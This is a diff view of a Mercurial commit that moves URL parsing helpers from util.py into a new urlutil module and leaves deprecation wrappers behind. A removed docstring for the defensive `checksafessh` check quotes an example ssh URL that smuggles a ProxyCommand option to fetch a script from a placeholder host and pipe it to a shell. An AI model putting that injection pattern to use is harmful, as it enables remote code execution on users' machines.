comparison mercurial/util.py @ 46907:ffd3e823a7e5

urlutil: extract `url` related code from `util` into the new module The new module is well fitting for this new code. And this will be useful to make the gathered code collaborate more later. Differential Revision: https://phab.mercurial-scm.org/D10374
author Pierre-Yves David <pierre-yves.david@octobus.net>
date Mon, 12 Apr 2021 03:01:04 +0200
parents 856820b497fc
children 9c3e84569071
comparison
equal deleted inserted replaced
46906:33524c46a092 46907:ffd3e823a7e5
26 import mmap 26 import mmap
27 import os 27 import os
28 import platform as pyplatform 28 import platform as pyplatform
29 import re as remod 29 import re as remod
30 import shutil 30 import shutil
31 import socket
32 import stat 31 import stat
33 import sys 32 import sys
34 import time 33 import time
35 import traceback 34 import traceback
36 import warnings 35 import warnings
55 from .utils import ( 54 from .utils import (
56 compression, 55 compression,
57 hashutil, 56 hashutil,
58 procutil, 57 procutil,
59 stringutil, 58 stringutil,
59 urlutil,
60 ) 60 )
61 61
62 if pycompat.TYPE_CHECKING: 62 if pycompat.TYPE_CHECKING:
63 from typing import ( 63 from typing import (
64 Iterator, 64 Iterator,
65 List, 65 List,
66 Optional, 66 Optional,
67 Tuple, 67 Tuple,
68 Union,
69 ) 68 )
70 69
71 70
72 base85 = policy.importmod('base85') 71 base85 = policy.importmod('base85')
73 osutil = policy.importmod('osutil') 72 osutil = policy.importmod('osutil')
2957 mapping[prefix_char] = prefix_char 2956 mapping[prefix_char] = prefix_char
2958 r = remod.compile(br'%s(%s)' % (prefix, patterns)) 2957 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2959 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) 2958 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2960 2959
2961 2960
2962 def getport(port): 2961 def getport(*args, **kwargs):
2963 # type: (Union[bytes, int]) -> int 2962 msg = b'getport(...) moved to mercurial.utils.urlutil'
2964 """Return the port for a given network service. 2963 nouideprecwarn(msg, b'6.0', stacklevel=2)
2965 2964 return urlutil.getport(*args, **kwargs)
2966 If port is an integer, it's returned as is. If it's a string, it's 2965
2967 looked up using socket.getservbyname(). If there's no matching 2966
2968 service, error.Abort is raised. 2967 def url(*args, **kwargs):
2969 """ 2968 msg = b'url(...) moved to mercurial.utils.urlutil'
2970 try: 2969 nouideprecwarn(msg, b'6.0', stacklevel=2)
2971 return int(port) 2970 return urlutil.url(*args, **kwargs)
2972 except ValueError: 2971
2973 pass 2972
2974 2973 def hasscheme(*args, **kwargs):
2975 try: 2974 msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
2976 return socket.getservbyname(pycompat.sysstr(port)) 2975 nouideprecwarn(msg, b'6.0', stacklevel=2)
2977 except socket.error: 2976 return urlutil.hasscheme(*args, **kwargs)
2978 raise error.Abort( 2977
2979 _(b"no port number associated with service '%s'") % port 2978
2980 ) 2979 def hasdriveletter(*args, **kwargs):
2981 2980 msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
2982 2981 nouideprecwarn(msg, b'6.0', stacklevel=2)
2983 class url(object): 2982 return urlutil.hasdriveletter(*args, **kwargs)
2984 r"""Reliable URL parser. 2983
2985 2984
2986 This parses URLs and provides attributes for the following 2985 def urllocalpath(*args, **kwargs):
2987 components: 2986 msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
2988 2987 nouideprecwarn(msg, b'6.0', stacklevel=2)
2989 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> 2988 return urlutil.urllocalpath(*args, **kwargs)
2990 2989
2991 Missing components are set to None. The only exception is 2990
2992 fragment, which is set to '' if present but empty. 2991 def checksafessh(*args, **kwargs):
2993 2992 msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
2994 If parsefragment is False, fragment is included in query. If 2993 nouideprecwarn(msg, b'6.0', stacklevel=2)
2995 parsequery is False, query is included in path. If both are 2994 return urlutil.checksafessh(*args, **kwargs)
2996 False, both fragment and query are included in path. 2995
2997 2996
2998 See http://www.ietf.org/rfc/rfc2396.txt for more information. 2997 def hidepassword(*args, **kwargs):
2999 2998 msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
3000 Note that for backward compatibility reasons, bundle URLs do not 2999 nouideprecwarn(msg, b'6.0', stacklevel=2)
3001 take host names. That means 'bundle://../' has a path of '../'. 3000 return urlutil.hidepassword(*args, **kwargs)
3002 3001
3003 Examples: 3002
3004 3003 def removeauth(*args, **kwargs):
3005 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') 3004 msg = b'removeauth(...) moved to mercurial.utils.urlutil'
3006 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> 3005 nouideprecwarn(msg, b'6.0', stacklevel=2)
3007 >>> url(b'ssh://[::1]:2200//home/joe/repo') 3006 return urlutil.removeauth(*args, **kwargs)
3008 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3009 >>> url(b'file:///home/joe/repo')
3010 <url scheme: 'file', path: '/home/joe/repo'>
3011 >>> url(b'file:///c:/temp/foo/')
3012 <url scheme: 'file', path: 'c:/temp/foo/'>
3013 >>> url(b'bundle:foo')
3014 <url scheme: 'bundle', path: 'foo'>
3015 >>> url(b'bundle://../foo')
3016 <url scheme: 'bundle', path: '../foo'>
3017 >>> url(br'c:\foo\bar')
3018 <url path: 'c:\\foo\\bar'>
3019 >>> url(br'\\blah\blah\blah')
3020 <url path: '\\\\blah\\blah\\blah'>
3021 >>> url(br'\\blah\blah\blah#baz')
3022 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3023 >>> url(br'file:///C:\users\me')
3024 <url scheme: 'file', path: 'C:\\users\\me'>
3025
3026 Authentication credentials:
3027
3028 >>> url(b'ssh://joe:xyz@x/repo')
3029 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3030 >>> url(b'ssh://joe@x/repo')
3031 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3032
3033 Query strings and fragments:
3034
3035 >>> url(b'http://host/a?b#c')
3036 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3037 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3038 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3039
3040 Empty path:
3041
3042 >>> url(b'')
3043 <url path: ''>
3044 >>> url(b'#a')
3045 <url path: '', fragment: 'a'>
3046 >>> url(b'http://host/')
3047 <url scheme: 'http', host: 'host', path: ''>
3048 >>> url(b'http://host/#a')
3049 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3050
3051 Only scheme:
3052
3053 >>> url(b'http:')
3054 <url scheme: 'http'>
3055 """
3056
3057 _safechars = b"!~*'()+"
3058 _safepchars = b"/!~*'()+:\\"
3059 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3060
3061 def __init__(self, path, parsequery=True, parsefragment=True):
3062 # type: (bytes, bool, bool) -> None
3063 # We slowly chomp away at path until we have only the path left
3064 self.scheme = self.user = self.passwd = self.host = None
3065 self.port = self.path = self.query = self.fragment = None
3066 self._localpath = True
3067 self._hostport = b''
3068 self._origpath = path
3069
3070 if parsefragment and b'#' in path:
3071 path, self.fragment = path.split(b'#', 1)
3072
3073 # special case for Windows drive letters and UNC paths
3074 if hasdriveletter(path) or path.startswith(b'\\\\'):
3075 self.path = path
3076 return
3077
3078 # For compatibility reasons, we can't handle bundle paths as
3079 # normal URLS
3080 if path.startswith(b'bundle:'):
3081 self.scheme = b'bundle'
3082 path = path[7:]
3083 if path.startswith(b'//'):
3084 path = path[2:]
3085 self.path = path
3086 return
3087
3088 if self._matchscheme(path):
3089 parts = path.split(b':', 1)
3090 if parts[0]:
3091 self.scheme, path = parts
3092 self._localpath = False
3093
3094 if not path:
3095 path = None
3096 if self._localpath:
3097 self.path = b''
3098 return
3099 else:
3100 if self._localpath:
3101 self.path = path
3102 return
3103
3104 if parsequery and b'?' in path:
3105 path, self.query = path.split(b'?', 1)
3106 if not path:
3107 path = None
3108 if not self.query:
3109 self.query = None
3110
3111 # // is required to specify a host/authority
3112 if path and path.startswith(b'//'):
3113 parts = path[2:].split(b'/', 1)
3114 if len(parts) > 1:
3115 self.host, path = parts
3116 else:
3117 self.host = parts[0]
3118 path = None
3119 if not self.host:
3120 self.host = None
3121 # path of file:///d is /d
3122 # path of file:///d:/ is d:/, not /d:/
3123 if path and not hasdriveletter(path):
3124 path = b'/' + path
3125
3126 if self.host and b'@' in self.host:
3127 self.user, self.host = self.host.rsplit(b'@', 1)
3128 if b':' in self.user:
3129 self.user, self.passwd = self.user.split(b':', 1)
3130 if not self.host:
3131 self.host = None
3132
3133 # Don't split on colons in IPv6 addresses without ports
3134 if (
3135 self.host
3136 and b':' in self.host
3137 and not (
3138 self.host.startswith(b'[') and self.host.endswith(b']')
3139 )
3140 ):
3141 self._hostport = self.host
3142 self.host, self.port = self.host.rsplit(b':', 1)
3143 if not self.host:
3144 self.host = None
3145
3146 if (
3147 self.host
3148 and self.scheme == b'file'
3149 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3150 ):
3151 raise error.Abort(
3152 _(b'file:// URLs can only refer to localhost')
3153 )
3154
3155 self.path = path
3156
3157 # leave the query string escaped
3158 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3159 v = getattr(self, a)
3160 if v is not None:
3161 setattr(self, a, urlreq.unquote(v))
3162
3163 def copy(self):
3164 u = url(b'temporary useless value')
3165 u.path = self.path
3166 u.scheme = self.scheme
3167 u.user = self.user
3168 u.passwd = self.passwd
3169 u.host = self.host
3170 u.path = self.path
3171 u.query = self.query
3172 u.fragment = self.fragment
3173 u._localpath = self._localpath
3174 u._hostport = self._hostport
3175 u._origpath = self._origpath
3176 return u
3177
3178 @encoding.strmethod
3179 def __repr__(self):
3180 attrs = []
3181 for a in (
3182 b'scheme',
3183 b'user',
3184 b'passwd',
3185 b'host',
3186 b'port',
3187 b'path',
3188 b'query',
3189 b'fragment',
3190 ):
3191 v = getattr(self, a)
3192 if v is not None:
3193 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3194 return b'<url %s>' % b', '.join(attrs)
3195
3196 def __bytes__(self):
3197 r"""Join the URL's components back into a URL string.
3198
3199 Examples:
3200
3201 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3202 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3203 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3204 'http://user:pw@host:80/?foo=bar&baz=42'
3205 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3206 'http://user:pw@host:80/?foo=bar%3dbaz'
3207 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3208 'ssh://user:pw@[::1]:2200//home/joe#'
3209 >>> bytes(url(b'http://localhost:80//'))
3210 'http://localhost:80//'
3211 >>> bytes(url(b'http://localhost:80/'))
3212 'http://localhost:80/'
3213 >>> bytes(url(b'http://localhost:80'))
3214 'http://localhost:80/'
3215 >>> bytes(url(b'bundle:foo'))
3216 'bundle:foo'
3217 >>> bytes(url(b'bundle://../foo'))
3218 'bundle:../foo'
3219 >>> bytes(url(b'path'))
3220 'path'
3221 >>> bytes(url(b'file:///tmp/foo/bar'))
3222 'file:///tmp/foo/bar'
3223 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3224 'file:///c:/tmp/foo/bar'
3225 >>> print(url(br'bundle:foo\bar'))
3226 bundle:foo\bar
3227 >>> print(url(br'file:///D:\data\hg'))
3228 file:///D:\data\hg
3229 """
3230 if self._localpath:
3231 s = self.path
3232 if self.scheme == b'bundle':
3233 s = b'bundle:' + s
3234 if self.fragment:
3235 s += b'#' + self.fragment
3236 return s
3237
3238 s = self.scheme + b':'
3239 if self.user or self.passwd or self.host:
3240 s += b'//'
3241 elif self.scheme and (
3242 not self.path
3243 or self.path.startswith(b'/')
3244 or hasdriveletter(self.path)
3245 ):
3246 s += b'//'
3247 if hasdriveletter(self.path):
3248 s += b'/'
3249 if self.user:
3250 s += urlreq.quote(self.user, safe=self._safechars)
3251 if self.passwd:
3252 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3253 if self.user or self.passwd:
3254 s += b'@'
3255 if self.host:
3256 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3257 s += urlreq.quote(self.host)
3258 else:
3259 s += self.host
3260 if self.port:
3261 s += b':' + urlreq.quote(self.port)
3262 if self.host:
3263 s += b'/'
3264 if self.path:
3265 # TODO: similar to the query string, we should not unescape the
3266 # path when we store it, the path might contain '%2f' = '/',
3267 # which we should *not* escape.
3268 s += urlreq.quote(self.path, safe=self._safepchars)
3269 if self.query:
3270 # we store the query in escaped form.
3271 s += b'?' + self.query
3272 if self.fragment is not None:
3273 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3274 return s
3275
3276 __str__ = encoding.strmethod(__bytes__)
3277
3278 def authinfo(self):
3279 user, passwd = self.user, self.passwd
3280 try:
3281 self.user, self.passwd = None, None
3282 s = bytes(self)
3283 finally:
3284 self.user, self.passwd = user, passwd
3285 if not self.user:
3286 return (s, None)
3287 # authinfo[1] is passed to urllib2 password manager, and its
3288 # URIs must not contain credentials. The host is passed in the
3289 # URIs list because Python < 2.4.3 uses only that to search for
3290 # a password.
3291 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3292
3293 def isabs(self):
3294 if self.scheme and self.scheme != b'file':
3295 return True # remote URL
3296 if hasdriveletter(self.path):
3297 return True # absolute for our purposes - can't be joined()
3298 if self.path.startswith(br'\\'):
3299 return True # Windows UNC path
3300 if self.path.startswith(b'/'):
3301 return True # POSIX-style
3302 return False
3303
3304 def localpath(self):
3305 # type: () -> bytes
3306 if self.scheme == b'file' or self.scheme == b'bundle':
3307 path = self.path or b'/'
3308 # For Windows, we need to promote hosts containing drive
3309 # letters to paths with drive letters.
3310 if hasdriveletter(self._hostport):
3311 path = self._hostport + b'/' + self.path
3312 elif (
3313 self.host is not None and self.path and not hasdriveletter(path)
3314 ):
3315 path = b'/' + path
3316 return path
3317 return self._origpath
3318
3319 def islocal(self):
3320 '''whether localpath will return something that posixfile can open'''
3321 return (
3322 not self.scheme
3323 or self.scheme == b'file'
3324 or self.scheme == b'bundle'
3325 )
3326
3327
3328 def hasscheme(path):
3329 # type: (bytes) -> bool
3330 return bool(url(path).scheme) # cast to help pytype
3331
3332
3333 def hasdriveletter(path):
3334 # type: (bytes) -> bool
3335 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3336
3337
3338 def urllocalpath(path):
3339 # type: (bytes) -> bytes
3340 return url(path, parsequery=False, parsefragment=False).localpath()
3341
3342
3343 def checksafessh(path):
3344 # type: (bytes) -> None
3345 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3346
3347 This is a sanity check for ssh urls. ssh will parse the first item as
3348 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3349 Let's prevent these potentially exploited urls entirely and warn the
3350 user.
3351
3352 Raises an error.Abort when the url is unsafe.
3353 """
3354 path = urlreq.unquote(path)
3355 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3356 raise error.Abort(
3357 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3358 )
3359
3360
3361 def hidepassword(u):
3362 # type: (bytes) -> bytes
3363 '''hide user credential in a url string'''
3364 u = url(u)
3365 if u.passwd:
3366 u.passwd = b'***'
3367 return bytes(u)
3368
3369
3370 def removeauth(u):
3371 # type: (bytes) -> bytes
3372 '''remove all authentication information from a url string'''
3373 u = url(u)
3374 u.user = u.passwd = None
3375 return bytes(u)
3376 3007
3377 3008
3378 timecount = unitcountfn( 3009 timecount = unitcountfn(
3379 (1, 1e3, _(b'%.0f s')), 3010 (1, 1e3, _(b'%.0f s')),
3380 (100, 1, _(b'%.1f s')), 3011 (100, 1, _(b'%.1f s')),